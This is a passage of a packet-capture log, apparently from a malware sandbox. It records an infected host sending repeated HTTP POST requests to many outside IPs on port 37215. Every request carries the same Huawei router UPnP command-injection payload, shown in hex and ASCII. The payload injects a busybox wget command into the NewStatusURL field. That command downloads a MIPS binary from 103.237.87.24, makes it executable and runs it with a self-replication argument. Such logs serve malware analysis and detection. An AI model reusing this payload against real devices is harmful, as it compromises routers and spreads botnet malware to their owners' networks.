                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1612192.168.2.1337964137.191.67.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505644083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1613192.168.2.1352750139.224.182.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505676031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1614192.168.2.1348940197.0.216.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505705118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1615192.168.2.1348866197.4.47.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505749941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1616192.168.2.134316041.146.184.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505795002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1617192.168.2.135373841.68.220.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505837917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1618192.168.2.1354246157.78.203.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.505871058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1619192.168.2.134908841.71.113.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506020069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1620192.168.2.135058241.92.177.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506067038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1621192.168.2.1333882197.81.100.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.506087065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
